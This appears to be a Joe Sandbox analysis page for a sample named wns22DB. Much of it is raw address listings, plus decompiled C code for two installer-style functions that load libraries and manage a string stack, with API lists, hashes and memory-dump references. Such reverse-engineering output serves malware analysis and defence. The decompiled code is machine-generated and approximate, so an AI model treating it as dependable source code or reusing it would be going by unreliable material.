                                                                                                                                                                                                  0x00406d2a
                                                                                                                                                                                                  0x00406d2d
                                                                                                                                                                                                  0x00406d2d
                                                                                                                                                                                                  0x00406d33
                                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                                  0x00406cd4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cd4
                                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                                  0x00406d38
                                                                                                                                                                                                  0x00406d3b
                                                                                                                                                                                                  0x00406d3e
                                                                                                                                                                                                  0x00406d41
                                                                                                                                                                                                  0x00406d44
                                                                                                                                                                                                  0x00406d47
                                                                                                                                                                                                  0x00406d4a
                                                                                                                                                                                                  0x00406d4d
                                                                                                                                                                                                  0x00406d50
                                                                                                                                                                                                  0x00406d53
                                                                                                                                                                                                  0x00406d6b
                                                                                                                                                                                                  0x00406d6e
                                                                                                                                                                                                  0x00406d71
                                                                                                                                                                                                  0x00406d74
                                                                                                                                                                                                  0x00406d74
                                                                                                                                                                                                  0x00406d77
                                                                                                                                                                                                  0x00406d7b
                                                                                                                                                                                                  0x00406d7d
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d5d
                                                                                                                                                                                                  0x00406d62
                                                                                                                                                                                                  0x00406d64
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d80
                                                                                                                                                                                                  0x00406d87
                                                                                                                                                                                                  0x00406d8a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x0040701d
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00407023
                                                                                                                                                                                                  0x00407026
                                                                                                                                                                                                  0x00407029
                                                                                                                                                                                                  0x0040702d
                                                                                                                                                                                                  0x00407030
                                                                                                                                                                                                  0x00407036
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x0040703b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407128
                                                                                                                                                                                                  0x0040712c
                                                                                                                                                                                                  0x0040714e
                                                                                                                                                                                                  0x00407151
                                                                                                                                                                                                  0x0040715b
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040712e
                                                                                                                                                                                                  0x00407131
                                                                                                                                                                                                  0x00407135
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x0040713b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071e5
                                                                                                                                                                                                  0x004071e9
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x0040720e
                                                                                                                                                                                                  0x00407215
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x004071eb
                                                                                                                                                                                                  0x004071ee
                                                                                                                                                                                                  0x004071f1
                                                                                                                                                                                                  0x004071f4
                                                                                                                                                                                                  0x004071fb
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x00407142
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072d6
                                                                                                                                                                                                  0x004072d9
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f10
                                                                                                                                                                                                  0x00406f12
                                                                                                                                                                                                  0x00406f19
                                                                                                                                                                                                  0x00406f1a
                                                                                                                                                                                                  0x00406f1c
                                                                                                                                                                                                  0x00406f1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f2a
                                                                                                                                                                                                  0x00406f2d
                                                                                                                                                                                                  0x00406f2f
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f32
                                                                                                                                                                                                  0x00406f35
                                                                                                                                                                                                  0x00406f3c
                                                                                                                                                                                                  0x00406f3f
                                                                                                                                                                                                  0x00406f4d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407226
                                                                                                                                                                                                  0x0040722d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407236
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x0040723c
                                                                                                                                                                                                  0x0040723f
                                                                                                                                                                                                  0x00407242
                                                                                                                                                                                                  0x00407246
                                                                                                                                                                                                  0x00407249
                                                                                                                                                                                                  0x0040724f
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407254
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725e
                                                                                                                                                                                                  0x004072be
                                                                                                                                                                                                  0x004072c1
                                                                                                                                                                                                  0x004072c6
                                                                                                                                                                                                  0x004072c7
                                                                                                                                                                                                  0x004072c9
                                                                                                                                                                                                  0x004072cb
                                                                                                                                                                                                  0x004072ce
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071e0
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00407260
                                                                                                                                                                                                  0x00407266
                                                                                                                                                                                                  0x00407269
                                                                                                                                                                                                  0x0040726c
                                                                                                                                                                                                  0x0040726f
                                                                                                                                                                                                  0x00407272
                                                                                                                                                                                                  0x00407275
                                                                                                                                                                                                  0x00407278
                                                                                                                                                                                                  0x0040727b
                                                                                                                                                                                                  0x0040727e
                                                                                                                                                                                                  0x00407281
                                                                                                                                                                                                  0x0040729a
                                                                                                                                                                                                  0x0040729d
                                                                                                                                                                                                  0x004072a0
                                                                                                                                                                                                  0x004072a3
                                                                                                                                                                                                  0x004072a7
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x0040728b
                                                                                                                                                                                                  0x00407290
                                                                                                                                                                                                  0x00407292
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x004072b0
                                                                                                                                                                                                  0x004072b7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f55
                                                                                                                                                                                                  0x00406f58
                                                                                                                                                                                                  0x00406f8e
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c4
                                                                                                                                                                                                  0x004070c6
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x004070cc
                                                                                                                                                                                                  0x004070cf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070d5
                                                                                                                                                                                                  0x004070d9
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00406f5a
                                                                                                                                                                                                  0x00406f5c
                                                                                                                                                                                                  0x00406f5e
                                                                                                                                                                                                  0x00406f60
                                                                                                                                                                                                  0x00406f63
                                                                                                                                                                                                  0x00406f64
                                                                                                                                                                                                  0x00406f66
                                                                                                                                                                                                  0x00406f68
                                                                                                                                                                                                  0x00406f6b
                                                                                                                                                                                                  0x00406f6e
                                                                                                                                                                                                  0x00406f84
                                                                                                                                                                                                  0x00406f89
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc5
                                                                                                                                                                                                  0x00406ff1
                                                                                                                                                                                                  0x00406ff3
                                                                                                                                                                                                  0x00406ffa
                                                                                                                                                                                                  0x00406ffd
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407007
                                                                                                                                                                                                  0x0040700a
                                                                                                                                                                                                  0x00407011
                                                                                                                                                                                                  0x00407014
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407044
                                                                                                                                                                                                  0x00407047
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00407049
                                                                                                                                                                                                  0x0040704f
                                                                                                                                                                                                  0x00407052
                                                                                                                                                                                                  0x00407055
                                                                                                                                                                                                  0x00407058
                                                                                                                                                                                                  0x0040705b
                                                                                                                                                                                                  0x0040705e
                                                                                                                                                                                                  0x00407061
                                                                                                                                                                                                  0x00407064
                                                                                                                                                                                                  0x00407067
                                                                                                                                                                                                  0x0040706a
                                                                                                                                                                                                  0x00407083
                                                                                                                                                                                                  0x00407085
                                                                                                                                                                                                  0x00407088
                                                                                                                                                                                                  0x00407089
                                                                                                                                                                                                  0x0040708c
                                                                                                                                                                                                  0x0040708e
                                                                                                                                                                                                  0x00407091
                                                                                                                                                                                                  0x00407093
                                                                                                                                                                                                  0x00407095
                                                                                                                                                                                                  0x00407098
                                                                                                                                                                                                  0x0040709a
                                                                                                                                                                                                  0x0040709d
                                                                                                                                                                                                  0x004070a1
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a4
                                                                                                                                                                                                  0x004070a7
                                                                                                                                                                                                  0x004070aa
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x00407074
                                                                                                                                                                                                  0x00407079
                                                                                                                                                                                                  0x0040707b
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x004070ad
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x00406fc7
                                                                                                                                                                                                  0x00406fca
                                                                                                                                                                                                  0x00406fcc
                                                                                                                                                                                                  0x00406fcf
                                                                                                                                                                                                  0x00406fd2
                                                                                                                                                                                                  0x00406fd5
                                                                                                                                                                                                  0x00406fd7
                                                                                                                                                                                                  0x00406fda
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe3
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406f70
                                                                                                                                                                                                  0x00406f73
                                                                                                                                                                                                  0x00406f75
                                                                                                                                                                                                  0x00406f78
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cdb
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00406ce1
                                                                                                                                                                                                  0x00406ce4
                                                                                                                                                                                                  0x00406ce7
                                                                                                                                                                                                  0x00406cea
                                                                                                                                                                                                  0x00406ced
                                                                                                                                                                                                  0x00406cf0
                                                                                                                                                                                                  0x00406cf3
                                                                                                                                                                                                  0x00406cf5
                                                                                                                                                                                                  0x00406cf8
                                                                                                                                                                                                  0x00406cfb
                                                                                                                                                                                                  0x00406cfe
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e66
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00406e6c
                                                                                                                                                                                                  0x00406e6f
                                                                                                                                                                                                  0x00406e72
                                                                                                                                                                                                  0x00406e75
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e7a
                                                                                                                                                                                                  0x00406e7d
                                                                                                                                                                                                  0x00406e80
                                                                                                                                                                                                  0x00406e83
                                                                                                                                                                                                  0x00406e86
                                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                                  0x00406e8a
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                  0x00406e92
                                                                                                                                                                                                  0x00406e95
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e9b
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f7
                                                                                                                                                                                                  0x004070fa
                                                                                                                                                                                                  0x004070fd
                                                                                                                                                                                                  0x00407100
                                                                                                                                                                                                  0x00407103
                                                                                                                                                                                                  0x00407106
                                                                                                                                                                                                  0x00407107
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x0040710c
                                                                                                                                                                                                  0x0040710f
                                                                                                                                                                                                  0x00407112
                                                                                                                                                                                                  0x00407115
                                                                                                                                                                                                  0x00407118
                                                                                                                                                                                                  0x0040711c
                                                                                                                                                                                                  0x0040711e
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x0040715e

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                  • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                                                  			E00402032(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x470318");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4702e8 =  *0x4702e8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C41(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C41(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E00406831( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
					if(_t38 == _t32) {
						E00405450(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x2000, _t34, 0x41e638, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403A78( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8)); // executed
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                                                                                  0x00402032
                                                                                                                                                                                                  0x00402032
                                                                                                                                                                                                  0x00402037
                                                                                                                                                                                                  0x0040203e
                                                                                                                                                                                                  0x004020fd
                                                                                                                                                                                                  0x0040224b
                                                                                                                                                                                                  0x0040224b
                                                                                                                                                                                                  0x00402ac5
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ad4
                                                                                                                                                                                                  0x00402ad4
                                                                                                                                                                                                  0x0040204d
                                                                                                                                                                                                  0x00402057
                                                                                                                                                                                                  0x0040205a
                                                                                                                                                                                                  0x0040206a
                                                                                                                                                                                                  0x0040206e
                                                                                                                                                                                                  0x00402076
                                                                                                                                                                                                  0x00402079
                                                                                                                                                                                                  0x004020f6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004020f6
                                                                                                                                                                                                  0x0040207b
                                                                                                                                                                                                  0x00402086
                                                                                                                                                                                                  0x0040208a
                                                                                                                                                                                                  0x004020ca
                                                                                                                                                                                                  0x0040208c
                                                                                                                                                                                                  0x0040208f
                                                                                                                                                                                                  0x00402092
                                                                                                                                                                                                  0x004020be
                                                                                                                                                                                                  0x00402094
                                                                                                                                                                                                  0x00402097
                                                                                                                                                                                                  0x004020a0
                                                                                                                                                                                                  0x004020a2
                                                                                                                                                                                                  0x004020a2
                                                                                                                                                                                                  0x004020a0
                                                                                                                                                                                                  0x00402092
                                                                                                                                                                                                  0x004020d2
                                                                                                                                                                                                  0x004020eb
                                                                                                                                                                                                  0x004020eb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004020d2
                                                                                                                                                                                                  0x0040205d
                                                                                                                                                                                                  0x00402065
                                                                                                                                                                                                  0x00402068
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 334405425-0
                                                                                                                                                                                                  • Opcode ID: a40cda478381b174380c6438290ed07428a8f26064c7146cbc43d69b11d09b66
                                                                                                                                                                                                  • Instruction ID: 17bb0c2c40c4ecca23a016955451882c5d92c2645284391b8b2ee9a6a7fda870
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a40cda478381b174380c6438290ed07428a8f26064c7146cbc43d69b11d09b66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D521B031D00215BACF20AFA5CE4DA9E7A70BF04358F60813BF515B11E0DBBD8981DA6E
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                                                  			E00401B77(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x41e638; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x4004); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040640A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x41e638; // 0x0
						 *_t34 = _t12;
						 *0x41e638 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E004063E8(_t33, _t3);
							_push(_t30);
							 *0x41e638 =  *_t30; // executed
							GlobalFree(); // executed
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"ExecToStack";
								E004063E8(_t36, _t30 + 4);
								_t22 =  *0x41e638; // 0x0
								E004063E8(_t32, _t22 + 4);
								_t25 =  *0x41e638; // 0x0
								_push(_t36);
								_push(_t25 + 4);
								E004063E8();
								L15:
								 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040640A(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405A4E();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}














                                                                                                                                                                                                  0x00401b77
                                                                                                                                                                                                  0x00401b77
                                                                                                                                                                                                  0x00401b7a
                                                                                                                                                                                                  0x00401b82
                                                                                                                                                                                                  0x00401bcb
                                                                                                                                                                                                  0x00401bf9
                                                                                                                                                                                                  0x00401c02
                                                                                                                                                                                                  0x00401c04
                                                                                                                                                                                                  0x00401c08
                                                                                                                                                                                                  0x00401c0d
                                                                                                                                                                                                  0x00401c12
                                                                                                                                                                                                  0x00401c14
                                                                                                                                                                                                  0x00401bcd
                                                                                                                                                                                                  0x00401bcf
                                                                                                                                                                                                  0x0040288b
